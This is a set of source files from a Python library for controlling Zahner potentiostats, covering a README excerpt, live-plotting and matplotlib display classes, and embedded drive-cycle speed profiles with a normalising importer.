ZahnerPP2x2.setCoupling(COUPLING.POTENTIOSTATIC)
ZahnerPP2x2.setMaximumTimeParameter(15)
'''
Start measurement
'''
ZahnerPP2x2.setVoltageParameter(0)
ZahnerPP2x2.measurePolarization()
```
# 📖 Examples
The application of the library is shown in the example repository [Zahner-Remote-Python](https://github.com/Zahner-elektrik/Zahner-Remote-Python).
# 📧 Haveing a question?
Send an <a href="mailto:[email protected]?subject=Zahner-Remote-Python Question&body=Your Message">e-mail</a> to our support team.
# ⁉️ Found a bug or missing a specific feature?
Feel free to **create a new issue** with a respective title and description on the the [Zahner-Remote-Python](https://github.com/Zahner-elektrik/Zahner-Remote-Python/issues) repository. If you already found a solution to your problem, **we would love to review your pull request**!
# ✅ Requirements
Programming is done with the latest python version at the time of commit.
The only mandatory library is the [pySerial](https://pyserial.readthedocs.io/en/latest/) library. Also numpy and matplotlib are needed if you want to plot the data.
| zahner-potentiostat | /zahner_potentiostat-1.1.0.tar.gz/zahner_potentiostat-1.1.0/README.md | README.md |
from .dcplot import DCPlot
from zahner_potentiostat.scpi_control.datareceiver import TrackTypes, DataReceiver
import multiprocessing
import threading
import time
from enum import Enum
from typing import Union, Optional
class OnlineDisplayStatus(Enum):
"""Online Display Status"""
RENDERED = 0
CLOSED = 1
class OnlineDisplayJob(Enum):
"""Online Display Status"""
APPEND = 0
CLEAR = 1
class PlottingProcess:
"""Auxiliary class for displaying the plotting window.
By default, the program waits until the plotting window is closed.
As long as they are not closed, they have computing time and can be interacted with.
However, if the plotting window is called as an online display, then it only gets computing time
when the display pause is called. Also the plotting must always take place in the main thread.
Therefore this class comes in a new process, in which only plotting is done, so you can always
interact with the live display and it doesn't freeze.
"""
def __init__(self):
"""Constructor"""
self._pipe = None
self._display = None
return
def terminate(self) -> None:
"""Close"""
self._display.close()
return
def processingLoop(self) -> None:
"""Main process loop.
This is the main loop and will continue until None is sent to the process or the display is closed.
The data is sent to the process with a process pipeline.
"""
while True:
try:
if self._display.isOpen() == False:
self._pipe.send(OnlineDisplayStatus.CLOSED.value)
self.terminate()
return
if self._pipe.poll() == False:
self._display.pause(0.04)
else:
command = self._pipe.recv()
if command is None:
self.terminate()
return
elif command["job"] == OnlineDisplayJob.APPEND.value:
self._display.addData(command["data"][0], command["data"][1])
elif command["job"] == OnlineDisplayJob.CLEAR.value:
self._display.clearPlot()
self._pipe.send(OnlineDisplayStatus.RENDERED.value)
except Exception as e:
raise e
print("Error online display receiver.")
print(f"Exception message: {e}")
self.terminate()
return
return
def __call__(self, pipe: multiprocessing.Pipe, displayConfiguration: dict) -> None:
"""Call method implementation.
Initialization and call of the main loop of the process in which the data is processed and plotted.
:param pipe: multiprocessing.Pipe() object from the process.
"""
self._pipe = pipe
self._display = DCPlot(**displayConfiguration)
self.processingLoop()
return
class OnlineDisplay(object):
"""
Online display class, which allows to display live the measurement data while the
measurement is taking place.
This class sends the data to the plotting process, which is then displayed by the other process.
This class is passed the :class:`~zahner_potentiostat.scpi_control.datareceiver.DataReceiver` object of the measuring device, then after calling the
constructor all data from the measuring device are displayed live.
The other possibility is to pass the data with the variable data. Then the data must be passed
as you can read in the documentation of :func:`~zahner_potentiostat.display.dcplot.DCPlot.addData`.
By default, the X axis is time and current and voltage are each displayed on a Y axis.
The variable displayConfiguration can be used to change the display format.
With this variable either two default settings can be selected, or everything can be set individually.
displayConfiguration="UI": X-axis voltage, Y-axis current.
displayConfiguration="UlogI": X-axis voltage, Y-axis magnitude of current logarithmically scaled.
Instead of the default diagram presets, the axis labeling and the data type can also be changed individually
by passing a dictionary. All parameters from the two following examples must be passed.
With x/yTrackName the name of the data track is passed, which is to be displayed on the axis.
.. code-block:: python
displayConfiguration = {
"figureTitle":"My Custom Online Display",
"xAxisLabel":"Time",
"xAxisUnit":"s",
"xTrackName":TrackTypes.TIME.toString(),
"yAxis":[
{"label": "Cell Potential", "unit": "V", "trackName":TrackTypes.VOLTAGE.toString()},
{"label": "Cell Current", "unit": "A", "trackName":TrackTypes.CURRENT.toString()}
]}
or
.. code-block:: python
displayConfiguration = {
"figureTitle":"Online Display",
"xAxisLabel":"Potential",
"xAxisUnit":"V",
"xTrackName":TrackTypes.VOLTAGE.toString(),
"yAxis":[
{"label": "Current", "unit": "A", "name": "Current", "log": True, "trackName":TrackTypes.CURRENT.toString()}
]}
:param dataReceiver: Receiver object.
:type dataReceiver: :class:`~zahner_potentiostat.scpi_control.datareceiver.DataReceiver`
:param data: Packed into an array: [xData, yDatas]
:param displayConfiguration: Default value None for TIU diagrams. A dict or string as explained
in the previous text for other representations.
"""
def __init__(
self,
dataReceiver: DataReceiver,
data: Optional[list[list[float]]] = None,
displayConfiguration: Optional[Union[str, dict]] = None,
):
self._dataReveiver = dataReceiver
self._numberOfPoints = 0
self._processingLoopRunning = True
self.xTrackName = None
self.yTrackNames = []
self.minSendInterval = 0.1
self.lastOnlineMinTimeStamp = 0
self.lastOnlineMaxTimeStamp = 0
configuration = {
"figureTitle": "Online Display",
"xAxisLabel": "Time",
"xAxisUnit": "s",
"xTrackName": TrackTypes.TIME.toString(),
"yAxis": [
{
"label": "Voltage",
"unit": "V",
"trackName": TrackTypes.VOLTAGE.toString(),
},
{
"label": "Current",
"unit": "A",
"trackName": TrackTypes.CURRENT.toString(),
},
],
}
if isinstance(displayConfiguration, dict):
self.xTrackName = configuration["xTrackName"]
for yAxis in configuration["yAxis"]:
self.yTrackNames.append(yAxis["trackName"])
configuration = displayConfiguration
elif isinstance(displayConfiguration, str):
if "UI" == displayConfiguration:
self.xTrackName = TrackTypes.VOLTAGE.toString()
self.yTrackNames = [TrackTypes.CURRENT.toString()]
configuration = {
"figureTitle": "Online Display",
"xAxisLabel": "Voltage",
"xAxisUnit": "V",
"yAxis": [
{
"label": "Current",
"unit": "A",
"name": "Current",
"log": False,
}
],
}
elif "UlogI" == displayConfiguration:
self.xTrackName = TrackTypes.VOLTAGE.toString()
self.yTrackNames = [TrackTypes.CURRENT.toString()]
configuration = {
"figureTitle": "Online Display",
"xAxisLabel": "Voltage",
"xAxisUnit": "V",
"yAxis": [
{
"label": "Current",
"unit": "A",
"name": "Current",
"log": True,
}
],
}
else:
self.xTrackName = configuration["xTrackName"]
for yAxis in configuration["yAxis"]:
self.yTrackNames.append(yAxis["trackName"])
self.plot_pipe, plotter_pipe = multiprocessing.Pipe()
self.plotter = PlottingProcess()
self.plot_process = multiprocessing.Process(
target=self.plotter,
args=(
plotter_pipe,
configuration,
),
daemon=True,
)
self.plot_process.start()
if data == None:
self._dataProcessingThreadHandle = threading.Thread(
target=self.processingLoop
)
self._dataProcessingThreadHandle.start()
else:
self._sendDataToProcess(data)
return
def stopProcessingLoop(self) -> None:
"""
This function must be called by another thread which tells the processing loop
to stop the loop to process online data. Because of the Matplotlib syntax,
the plot window will then also be closed, but then the complete data can be displayed.
"""
self._processingLoopRunning = False
return
def setMinimumSendInterval(self, interval: float) -> None:
"""Set the minimum interval for sending data.
Only after this time is it checked again whether data can be sent to the online display.
:param interval: Time in s.
"""
self.minSendInterval = interval
return
def processingLoop(self) -> None:
"""Measurement data processing thread.
This thread reads from the DataReceiver object. If there is new data, all points are sent to
the PlottingProcess, which then plots the data.
"""
lastNumberOfPoints = 0
while self._processingLoopRunning == True:
number = self._dataReveiver.getNumberOfOnlinePoints()
if lastNumberOfPoints != number:
lastNumberOfPoints = number
if number > 0:
data = self._dataReveiver.getOnlinePoints()
try:
if not self.plot_pipe.closed:
if self._replyFromProcessAvailable():
# delete old replys
reply = self._waitForReplyFromProcess()
if reply is OnlineDisplayStatus.CLOSED.value:
print("Online display closed.")
self._processingLoopRunning = False
return
minTime = min(data[TrackTypes.TIME.toString()])
maxTime = max(data[TrackTypes.TIME.toString()])
if maxTime <= self.lastOnlineMaxTimeStamp:
# delete online display data
self._sendDataToProcess(OnlineDisplayJob.CLEAR.value)
reply = self._waitForReplyFromProcess()
if reply is not OnlineDisplayStatus.RENDERED.value:
print("Error online display answer.")
self._processingLoopRunning = False
return
else:
# remove already existing data
dataFromIndex = next(
x[0]
for x in enumerate(data[TrackTypes.TIME.toString()])
if x[1] > self.lastOnlineMaxTimeStamp
)
for key in data.keys():
data[key] = data[key][dataFromIndex:]
self._sendDataToProcess(OnlineDisplayJob.APPEND.value, data)
reply = self._waitForReplyFromProcess()
if reply is not OnlineDisplayStatus.RENDERED.value:
print("Error online display answer.")
self._processingLoopRunning = False
return
self.lastOnlineMinTimeStamp = minTime
self.lastOnlineMaxTimeStamp = maxTime
else:
self._processingLoopRunning = False
except Exception as e:
print("Error online display transmitter.")
print(f"Exception message: {e}")
self._processingLoopRunning = False
return
time.sleep(self.minSendInterval)
else:
time.sleep(self.minSendInterval)
return
def _sendDataToProcess(
self, job: OnlineDisplayJob, data: Optional[list[list[float]]] = None
) -> None:
"""Sending data to the process via the pipe.
This method reads the data from the DataReceiver object and assembles it so that it can be
sent to the PlottingProcess.
:param data: The data to plot. data = [xData, yDatas]. Like :func:`~zahner_potentiostat.display.dcplot.DCPlot.addData`.
"""
if data is None:
self.plot_pipe.send({"job": job, "data": data})
else:
self.plot_pipe.send(
{
"job": job,
"data": [
data[self.xTrackName],
[data[y] for y in self.yTrackNames],
],
}
)
return
def _waitForReplyFromProcess(
self,
) -> dict[str, Union[OnlineDisplayJob, list[list[float]]]]:
return self.plot_pipe.recv()
def _replyFromProcessAvailable(self) -> bool:
return self.plot_pipe.poll()
def close(self) -> None:
"""Close the online display."""
self.stopProcessingLoop()
if self.plot_pipe.closed == False:
try:
self.plot_pipe.send(None)
except:
pass
return | zahner-potentiostat | /zahner_potentiostat-1.1.0.tar.gz/zahner_potentiostat-1.1.0/zahner_potentiostat/display/onlinedisplay.py | onlinedisplay.py |
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.ticker import EngFormatter
import numpy as np
from typing import Optional, Union
class DCPlot(object):
"""Example class for plotting the data.
This class is an example to show the data in an exemplary way. For special use cases, everyone
must implement the plots themselves. The plot was optimized for data over a time track.
X and Y axis are always displayed linearly. The labeling and unit of the axes can be adjusted
separately.
The constructor creates the plotting window with labels without data.
Theoretically, an infinite number of y axes are possible. However, only 2 have been tested so far.
The axes are automatically formatted with engineering prefixes.
The display blocks as long as it does not get any computing time. It is optimized to be able
to append data, and remains open after plt.show().
By default, matplotlib would wait until the display is closed by the user.
Example of how the yAxis parameter must be formatted:
[{"label": "Voltage", "unit": "V"}, {"label": "Current", "unit": "A", "log": True}]
The structure is an array with a dictionary for each axis. The dictionary has two keys:
* label: The label of the axis.
* unit: The unit of the axis.
:param figureTitle: Title of the figure.
:param xAxisLabel: Lable of the X-axis.
:param xAxisUnit: Unit of the X-axis.
:param yAxis: Data structure for the Y-axis.
"""
colors = ["r", "b", "g", "c", "m", "y"]
def __init__(
self,
figureTitle: str,
xAxisLabel: str,
xAxisUnit: str,
yAxis: list[dict[str, str]],
data: Optional[list[list[float]]] = None,
**kwargs
):
self._isOpen = True
self.xData = []
self.yData = []
self.yAxisConfig = yAxis
xFormatter = EngFormatter(unit=xAxisUnit)
yFormatters = []
for yAx in yAxis:
if "unit" in yAx.keys():
yFormatters.append(EngFormatter(unit=yAx["unit"]))
else:
yFormatters.append(EngFormatter(unit=""))
self.fig, self.axis = plt.subplots(1, 1)
self.fig.set_size_inches(10, 6)
self.fig.canvas.manager.set_window_title(figureTitle)
"""
Add a close event to easily check if the window is still open.
"""
self.fig.canvas.mpl_connect("close_event", self._closeEvent)
i = 0
self.line = []
self.allAxes = [self.axis]
for yAx in yAxis:
self.line.append(None)
self.yData.append([])
axLabel = ""
if "label" in yAx.keys():
axLabel = yAx["label"]
if "log" in self.yAxisConfig[i] and self.yAxisConfig[i]["log"] == True:
axLabel = "|" + axLabel + "|"
color = "fuchsia" # default, if there are not enough colors in the array
if i < len(DCPlot.colors):
color = DCPlot.colors[i]
# Voltage blue current red. Must be adjusted later if there are different voltages or currents.
if "unit" in yAx.keys():
if yAx["unit"] == "V":
color = "b"
elif yAx["unit"] == "A":
color = "r"
if i == 0:
(self.line[i],) = self.axis.plot(
self.xData, self.yData[i], label=axLabel, color=color, linewidth=1
)
self.axis.set_ylabel(axLabel)
if "log" in yAx.keys() and yAx["log"] == True:
self.axis.set_yscale("log")
self.axis.yaxis.set_major_formatter(yFormatters[i])
else:
self.allAxes.append(self.axis.twinx())
(self.line[i],) = self.allAxes[i].plot(
self.xData, self.yData[i], label=axLabel, color=color, linewidth=1
)
self.allAxes[i].set_ylabel(axLabel)
if "log" in yAx.keys() and yAx["log"] == True:
self.allAxes[i].set_yscale("log")
self.allAxes[i].yaxis.set_major_formatter(yFormatters[i])
i += 1
self.axis.xaxis.set_major_formatter(xFormatter)
self.axis.set_xlabel(xAxisLabel)
self.axis.xaxis.grid(which="both", linestyle="--")
self.axis.yaxis.grid(which="both", linestyle="--")
if len(yAxis) > 1:
plt.legend(handles=self.line, loc="best")
if data != None:
self.addData(data[0], data[1], redraw=False)
plt.figure(self.fig)
plt.tight_layout()
self.fig.canvas.draw()
plt.pause(100e-3)
return
def addData(
self, xData: list[float], yDatas: list[list[float]], redraw: bool = True
) -> None:
"""Append the data of the plot.
This method is used to append data to the plot.
xData contains an array with values for the X-axis. yDatas contains an array with one array
for each Y-axis. The number of points must be the same for each data track.
Example structure:
xData = [0,1,2,3]
yDatas = [[0,1,2,3],[0,1,2,3],...]
:param xData: Array with points for the X-axis.
:param yDatas: Array with arrys for each Y-axis.
"""
self.xData.extend(xData)
for i in range(len(self.yData)):
absRequired = False
if "log" in self.yAxisConfig[i] and self.yAxisConfig[i]["log"] == True:
absRequired = True
if absRequired == False:
self.yData[i].extend(yDatas[i])
else:
self.yData[i].extend(np.abs(yDatas[i]))
self.line[i].set_ydata(self.yData[i])
self.line[i].set_xdata(self.xData)
for ax in self.allAxes:
ax.relim(visible_only=True)
ax.autoscale_view(True, True, True)
if len(self.xData) > 0:
if min(self.xData) != max(self.xData):
self.axis.set_xlim(min(self.xData), max(self.xData))
if redraw:
plt.figure(self.fig)
plt.tight_layout()
self.fig.canvas.draw()
plt.pause(1e-3)
return
def pause(self, time: float) -> None:
"""Pause the plot.
When the display pause is called, it gets compute time and is re-rendered.
:param time: Pause in seconds.
"""
plt.figure(self.fig)
plt.pause(time)
return
def clearData(self) -> None:
"""Clear the data from the plot.
This command only deletes the data from the display.
"""
self.xData = []
for i in range(len(self.yData)):
self.yData[i] = []
self.line[i].set_ydata(self.yData[i])
self.line[i].set_xdata(self.xData)
return
def clearPlot(self) -> None:
"""Clear the data from the plot.
This command deletes the data from the display and then redraws all of them to update the display.
"""
self.clearData()
plt.tight_layout()
plt.draw()
plt.pause(1e-3)
return
def savePlot(
self,
file: str,
w: Optional[float] = None,
h: Optional[float] = None,
) -> None:
"""Saving the plot.
Saving the plot, where the size of the plot can be adjusted beforehand.
When saving, the file type must also be specified in the file name.
These are the data types of the corresponding matplotlib command
https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.savefig.html .
PDF works well for vector graphics.
:param file: File to save, with path and filetype.
:param w: With of the image in inches, but can be omitted if not needed.
:param h: Height of the image in inches, but can be omitted if not needed.
If only w is set, w is also used for the height, by matplotlib
and the image is square.
"""
if w != None:
self.fig.set_size_inches(w, h)
plt.tight_layout()
plt.draw()
plt.pause(1e-3)
self.fig.savefig(file, bbox_inches="tight")
return
def close(self) -> None:
"""Close the plot."""
plt.close()
return
def isOpen(self) -> bool:
"""Check if the window is open.
Checks if the window is still open. If the window is closed, a private variable in the
callback is set to false.
:returns: True if the window is open else False.
"""
return self._isOpen
def _closeEvent(self, evt) -> None:
"""Close event.
This function is called when the plotting window is closed.
"""
self._isOpen = False
plt.close(self.fig)
return | zahner-potentiostat | /zahner_potentiostat-1.1.0.tar.gz/zahner_potentiostat-1.1.0/zahner_potentiostat/display/dcplot.py | dcplot.py |
NYCCCO_profile: str = """0 0
1 0
2 0
3 0
4 0
5 0
6 0
7 0.3
8 0
9 0.2
10 0.3
11 0
12 0
13 0
14 0
15 0
16 0
17 0
18 0
19 0
20 0
21 0
22 0
23 0
24 0
25 0
26 0
27 0.1
28 0.2
29 0
30 0
31 0
32 0
33 0
34 0
35 0
36 0
37 0
38 0
39 0
40 0
41 0
42 0
43 0
44 0
45 0
46 0
47 0.4
48 2.8
49 5.6
50 7
51 7.6
52 7.6
53 6.2
54 6.4
55 7.6
56 9.5
57 8.9
58 8.6
59 9.6
60 12.4
61 15
62 17.8
63 21
64 22.9
65 21.7
66 18.2
67 14.5
68 10.2
69 5.6
70 2.5
71 2.1
72 3.1
73 5.7
74 9
75 10.8
76 10.8
77 9.5
78 6.5
79 3.9
80 2.6
81 1
82 0.8
83 0.1
84 0
85 0
86 0
87 0
88 0.3
89 0.2
90 0
91 0
92 0
93 0
94 0
95 0
96 2.7
97 8.3
98 12.4
99 15.7
100 17.4
101 17.3
102 17.2
103 15.1
104 11.2
105 8.6
106 5.9
107 5.4
108 6.8
109 6.9
110 4.8
111 5.7
112 7.1
113 6.8
114 5.9
115 6
116 6
117 5.9
118 5.6
119 5.5
120 7.2
121 9.9
122 10.8
123 11.4
124 11.9
125 12.1
126 12.6
127 12.3
128 10.6
129 9.9
130 9.4
131 8.9
132 7.6
133 6.1
134 5
135 3.7
136 2.6
137 1
138 0.8
139 0.1
140 0.4
141 0.2
142 0
143 0
144 0
145 1.3
146 6
147 10.2
148 12.1
149 13.8
150 15.1
151 16.2
152 15.9
153 16
154 16.8
155 17.5
156 18
157 19.6
158 21.7
159 23.1
160 23.7
161 24.1
162 24.5
163 25
164 25.2
165 24.6
166 24.3
167 23.3
168 22.7
169 22.1
170 21.6
171 21.1
172 20.3
173 19.2
174 17
175 13.9
176 14.1
177 14.6
178 14.6
179 14.5
180 14.4
181 14.2
182 14.2
183 13.2
184 11.5
185 8.4
186 5.5
187 3.7
188 2.9
189 1.3
190 0.8
191 0.3
192 0.1
193 0.1
194 0
195 1.3
196 3.9
197 9.9
198 15.9
199 19.3
200 20.7
201 21.4
202 21.4
203 20.5
204 19
205 16.7
206 13.1
207 11.2
208 14.9
209 19.8
210 23.8
211 25.7
212 26.2
213 26.4
214 23.3
215 19.6
216 18.9
217 19.3
218 19.4
219 18.5
220 17.5
221 16.4
222 15.6
223 15.6
224 16
225 16.8
226 17.5
227 18
228 19.6
229 21.7
230 23.5
231 24.6
232 25
233 24.3
234 23.1
235 20.7
236 17.2
237 13.5
238 9.2
239 3.3
240 0
241 0
242 0
243 0
244 0
245 0
246 0
247 0
248 0
249 0
250 0
251 0
252 0
253 0
254 0.2
255 2
256 4.5
257 6.4
258 7.2
259 7.6
260 7.2
261 6.6
262 6.5
263 5.1
264 4.4
265 5.5
266 3
267 3.4
268 3
269 2.9
270 1.3
271 0.8
272 0.3
273 0
274 0
275 0.3
276 4.7
277 9.7
278 13.9
279 16.7
280 19.1
281 20.5
282 20.5
283 19.7
284 19.9
285 20.4
286 20.9
287 21.4
288 21.9
289 22.4
290 22.1
291 21.4
292 20.8
293 20.3
294 20.5
295 19.3
296 17.3
297 17.1
298 16.7
299 14.3
300 11.9
301 10.7
302 10.2
303 9.4
304 10.6
305 12.8
306 13.7
307 12.3
308 10.4
309 8.6
310 5.5
311 3.2
312 2
313 0.6
314 0
315 0
316 0
317 0
318 0
319 0
320 0
321 0
322 0
323 2.5
324 6.1
325 5.5
326 3.2
327 3.6
328 6.1
329 9.1
330 9.8
331 8.6
332 6.8
333 5.9
334 5.6
335 6
336 7.2
337 8.4
338 9.3
339 7.6
340 5.5
341 2.5
342 0.1
343 0
344 0
345 0
346 0
347 0
348 0
349 0
350 0
351 0
352 0
353 0
354 0
355 0.1
356 0.3
357 0.5
358 0.6
359 0.5
360 0.2
361 0
362 0
363 0
364 0
365 0
366 0
367 0.1
368 0
369 0
370 0
371 0.1
372 0.1
373 0
374 0
375 0
376 0
377 0
378 0
379 0
380 0
381 0
382 0
383 0
384 0
385 0
386 0
387 0
388 0
389 0
390 0
391 0
392 0
393 0
394 0
395 0.2
396 1.6
397 3
398 3
399 2.1
400 2.3
401 4.6
402 7.8
403 9.9
404 10.7
405 10.2
406 10.1
407 10.7
408 10.9
409 11.4
410 11.1
411 10
412 8.8
413 8.2
414 8.6
415 10.2
416 11.8
417 13
418 13.3
419 12.8
420 11.7
421 11.7
422 12.4
423 13.7
424 14.4
425 14.3
426 14.7
427 15.1
428 15.3
429 15.8
430 14.5
431 12.2
432 11.1
433 12
434 13.1
435 12.2
436 8.9
437 7.7
438 7.6
439 8
440 5.5
441 3.3
442 2.4
443 1.4
444 0.6
445 0
446 0
447 0
448 0
449 0
450 0
451 0
452 0.1
453 0
454 0
455 0
456 0
457 0
458 0
459 0
460 0
461 0
462 0
463 0
464 0
465 0
466 0
467 0
468 0
469 0
470 0
471 0
472 0
473 0
474 0
475 0
476 0
477 0
478 0
479 0
480 0
481 0
482 0
483 0
484 0
485 0
486 0
487 0
488 0
489 0
490 0
491 0
492 0
493 0
494 0
495 1
496 4.1
497 7.4
498 10.2
499 11.3
500 11.8
501 12.2
502 14.3
503 16
504 17.8
505 18.6
506 19.6
507 20.2
508 19.9
509 19.7
510 20.8
511 21
512 18.8
513 17.6
514 13
515 7.5
516 2.9
517 0.8
518 0
519 0.2
520 0.7
521 1.4
522 2.3
523 2.7
524 3
525 2.7
526 1.2
527 0.1
528 0.7
529 1.8
530 3.1
531 3.9
532 5.3
533 7.8
534 9.7
535 10.3
536 10.2
537 9.4
538 7.1
539 6.8
540 8.9
541 10.6
542 11.9
543 15.5
544 19.6
545 22.8
546 25.1
547 26
548 26.7
549 27.3
550 27.7
551 27.6
552 27.3
553 25.7
554 23.3
555 20.6
556 17.8
557 14.9
558 11.3
559 7.4
560 4.6
561 1.7
562 0.7
563 0
564 0
565 0
566 0
567 0
568 0
569 0
570 0
571 0
572 0
573 0
574 0
575 0
576 0
577 0
578 0
579 0
580 0
581 0
582 0
583 0
584 0
585 0
586 0
587 0
588 0
589 0
590 0
591 0
592 0
593 0
594 0
595 0
596 0
597 0
598 0""" | zahner-potentiostat | /zahner_potentiostat-1.1.0.tar.gz/zahner_potentiostat-1.1.0/zahner_potentiostat/drivecycle/NYCCCOL.py | NYCCCOL.py |
import re
from .HUDDSCOL import *
from .NYCCCOL import *
def readLinesFromProfie(profile: str) -> list[str]:
"""Read lines from a file without the header.
This function reads all lines from a file except the first two lines.
:param file: Path to the file.
:returns: Array with the lines of the file.
"""
lines = []
if "NYCCCO" in profile:
lines = NYCCCO_profile.split("\n")
elif "HUDDSCOL" in profile:
lines = HUDDSCOL_profile.split("\n")
return lines
def calculatedNormalisedDataForLines(lines: list[str]) -> list[dict[str, float]]:
"""Get normalised data for the lines of the file.
This function is intended as an example.
With the help of the function the velocity data of the file are normalized to the absolute value
of 1 to be able to measure the profile later with a individual current factor.
The parser for the line content is developed as an example for both HUDDSCOL.txt and NYCCCOL.txt.
The decimal separator is a dot and the column separator is a tab.
The data structure required by the measureProfile() method is returned. The data is structured
like the following example:
[{"time": 0, "value": 0.1},{"time": 1, "value": 0.4},{"time": 2, "value": 0.3}]
The structure is an array with a dictionary for each step. The dictionary has two keys:
time: The time point of the value.
value: The value, what the value is whether voltage, current or other is specified in the
measureProfile() method.
:param lines: Array with the data lines of the file as string.
:returns: Explained data structure.
"""
maxValue = 0
normalisedData = []
seperatorRegex = re.compile(r"([0-9,.]+)[\W]+([0-9,.]+)")
for line in lines:
linematch = seperatorRegex.match(line)
if linematch != None:
data = dict()
data["time"] = float(linematch.group(1))
value = float(linematch.group(2))
if abs(value) > abs(maxValue):
maxValue = value
data["value"] = value
normalisedData.append(data)
for data in normalisedData:
"""
Normalisation to the biggest Value from -1 to 1.
"""
data["value"] = data["value"] / abs(maxValue)
return normalisedData
def getNormalisedCurrentTableForHUDDSCOL() -> list[dict[str, float]]:
"""
These are NOT correct current cycles they are SPEED CURVES.
These cycles are not correct, because these are velocity curves and not current or voltage curves.
These velocity curves must be converted to current curves or voltage curves depending on the application,
THIS MUST BE DONE BY THE USER.
The velocity waveforms were only obtained as an example of waveforms.
Here the path may need to be adjusted.
:returns: Explained data structure.
"""
lines = readLinesFromProfie("HUDDSCOL")
normalisedData = calculatedNormalisedDataForLines(lines)
return normalisedData
def getNormalisedCurrentTableForNYCCCOL() -> list[dict[str, float]]:
"""
These are NOT correct current cycles they are SPEED CURVES.
These cycles are not correct, because these are velocity curves and not current or voltage curves.
These velocity curves must be converted to current curves or voltage curves depending on the application,
THIS MUST BE DONE BY THE USER.
The velocity waveforms were only obtained as an example of waveforms.
Here the path may need to be adjusted.
:returns: Explained data structure.
"""
lines = readLinesFromProfie("NYCCCO")
normalisedData = calculatedNormalisedDataForLines(lines)
return normalisedData | zahner-potentiostat | /zahner_potentiostat-1.1.0.tar.gz/zahner_potentiostat-1.1.0/zahner_potentiostat/drivecycle/cycle_importer.py | cycle_importer.py |
HUDDSCOL_profile: str = """0 0
1 0
2 0
3 0
4 0
5 0
6 0
7 0
8 0
9 0
10 0
11 0
12 0
13 0
14 0
15 0
16 0
17 0
18 0
19 0
20 0
21 0
22 0
23 0
24 0
25 0.19
26 1
27 1.51
28 2.66
29 4.64
30 6.96
31 8.86
32 7.71
33 7.45
34 9.22
35 10
36 9.08
37 10.08
38 11.24
39 12.79
40 14
41 12.58
42 12.87
43 13
44 13
45 13.68
46 15
47 15
48 13.37
49 12.08
50 12.26
51 14.29
52 14.56
53 15.2
54 16.76
55 17
56 17
57 17.23
58 18.77
59 20.54
60 19.6
61 18.14
62 17.98
63 17
64 16.34
65 15
66 15
67 15
68 15.96
69 12.35
70 15.28
71 14.27
72 12.59
73 12.25
74 9.28
75 8
76 8
77 8.38
78 9.53
79 10.69
80 11
81 9
82 9
83 9.32
84 10
85 9.36
86 9
87 9.95
88 14.33
89 17.53
90 19.42
91 20
92 20.74
93 21
94 21.11
95 23.84
96 27
97 27
98 29.05
99 32.52
100 31.01
101 31
102 31.62
103 33
104 32.37
105 30.43
106 30
107 30
108 30.51
109 32.41
110 33
111 32.27
112 32
113 31.04
114 32.2
115 33.36
116 34
117 34
118 34
119 33.01
120 31.86
121 30.1
122 26.17
123 23.39
124 21.46
125 17.28
126 15.83
127 13.76
128 12.6
129 10.33
130 8.28
131 5.38
132 2.91
133 0
134 0
135 0
136 0
137 0
138 0
139 0
140 0
141 0
142 0
143 0
144 0
145 0
146 0
147 0
148 0
149 0
150 0
151 0
152 0
153 0
154 0
155 0
156 0
157 0
158 0
159 0
160 0
161 0
162 0
163 0
164 0
165 0
166 0
167 0
168 0
169 0
170 0
171 0
172 0
173 0
174 0.51
175 0.33
176 0
177 0
178 0
179 0
180 0
181 0
182 0
183 0
184 0
185 0
186 0
187 0
188 0
189 0
190 0
191 0
192 0
193 0
194 0
195 0
196 0
197 0.13
198 0.71
199 0
200 0
201 0
202 0
203 4.15
204 6
205 6
206 6
207 5.3
208 4.14
209 1.96
210 0
211 0
212 0
213 0
214 0
215 0
216 0
217 0
218 0
219 0
220 0
221 0
222 0
223 0
224 0
225 0
226 0
227 0
228 0
229 0
230 0
231 0.48
232 1.64
233 0.41
234 0
235 0
236 0
237 0
238 0
239 0
240 0
241 0
242 0
243 0
244 0
245 0
246 0
247 0
248 0
249 0
250 0
251 0
252 0
253 0
254 0
255 0
256 0
257 0
258 0
259 0
260 0
261 0
262 0
263 0
264 0
265 0
266 0
267 0
268 0
269 0
270 0
271 0
272 0
273 0
274 0
275 0
276 0
277 0
278 0
279 0
280 0
281 0
282 0
283 0
284 0
285 0
286 0
287 0
288 0
289 0
290 0
291 0
292 0
293 0
294 0
295 0
296 0
297 0
298 0
299 0
300 0.24
301 0.6
302 0
303 1.42
304 2
305 3.08
306 5.63
307 4
308 4
309 3.34
310 1.37
311 1
312 0
313 0
314 0
315 0
316 0
317 0
318 0
319 0.23
320 1.39
321 2
322 4.11
323 5
324 6.02
325 7.18
326 7.33
327 6.49
328 7
329 7
330 7
331 7
332 7
333 7.43
334 8
335 8
336 7.09
337 11.06
338 12.89
339 14.49
340 11.46
341 13.08
342 16.55
343 16
344 15.34
345 12.32
346 13
347 13
348 13
349 15.86
350 12
351 11.73
352 11
353 11
354 11
355 11.9
356 12.89
357 10.36
358 7.26
359 4.95
360 4.68
361 6.68
362 8
363 7.84
364 7
365 6.53
366 7.89
367 10.57
368 11
369 10.1
370 10.74
371 10.42
372 11
373 12.46
374 14.77
375 14.09
376 16.2
377 17
378 17
379 17
380 17
381 15.02
382 15.71
383 14
384 14.92
385 15.38
386 15.78
387 16
388 16
389 16.25
390 17.41
391 18.56
392 19
393 19.88
394 21
395 21
396 21
397 20.49
398 20
399 19.18
400 19
401 18.86
402 18.29
403 19
404 19.61
405 20
406 20
407 20
408 20
409 20
410 19.45
411 20.42
412 21.87
413 20.97
414 20.37
415 22
416 22
417 22.66
418 23
419 23.97
420 25.51
421 29
422 29
423 29
424 30.51
425 31
426 30
427 30
428 30
429 30.54
430 31
431 31.86
432 31
433 31.17
434 32.33
435 33
436 33
437 33.8
438 34
439 35.12
440 36
441 36
442 34.82
443 33.25
444 32.09
445 32
446 32
447 32
448 32
449 32
450 32.85
451 33.01
452 34
453 33.68
454 32.52
455 32
456 32
457 32.95
458 33
459 33
460 33.42
461 34
462 34.74
463 35
464 35
465 35
466 35
467 35
468 35
469 35.84
470 37.99
471 38
472 37.69
473 38.41
474 39.37
475 39
476 39
477 38.1
478 39
479 39.41
480 40.57
481 41.73
482 42
483 41.92
484 40
485 40
486 39.49
487 37.66
488 37
489 36.01
490 34.86
491 33.7
492 32.54
493 29.54
494 26.46
495 22.28
496 19.91
497 18.76
498 17.6
499 16.44
500 14.57
501 13.13
502 11.97
503 10.81
504 9.31
505 7.5
506 6.34
507 4.37
508 3.03
